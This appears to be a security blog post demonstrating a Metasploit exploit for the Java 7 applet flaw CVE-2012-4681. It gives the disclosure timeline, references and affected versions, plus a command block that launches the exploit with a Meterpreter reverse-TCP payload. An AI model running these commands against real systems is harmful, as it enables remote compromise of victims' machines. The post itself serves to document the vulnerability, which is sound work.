Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo

Timeline :

Vulnerability reported to ZDI by James Forshaw (tyranid)
Vulnerability reported to the vendor by ZDI the 2012-07-24.
Vulnerability found exploited in the wild and discovered by Michael Schierl
First details of the vulnerability the 2012-08-26
Source code of the vulnerability provided by jduck the 2012-08-26
Metasploit PoC provided the 2012-08-27
Patched through out-of-band Oracle Security Alert for CVE-2012-4681 the 2012-08-30.

PoC provided by :

Unknown
jduck
sinn3r
juan vazquez

Reference(s) :

CVE-2012-4681
OSVDB-84867
BID-55213
Zero-Day Season is Not Over Yet
Java 7 0-Day vulnerability information and mitigation
ZDI-12-197
Oracle Security Alert for CVE-2012-4681

Affected version(s) :

Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and previous.

Tested on Windows XP Pro SP3 & Ubuntu 12.04 with :

Internet Explorer 8 & Firefox 14.0.1 & Chrome
Oracle JSE 1.7.0_06-b24

Description :

This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

Commands :

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Windows 0day exploitation with Internet Explorer, Firefox and chrome :

Linux Ubuntu 12.04 exploitation with Firefox :

2 thoughts on “Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo

Comments are closed.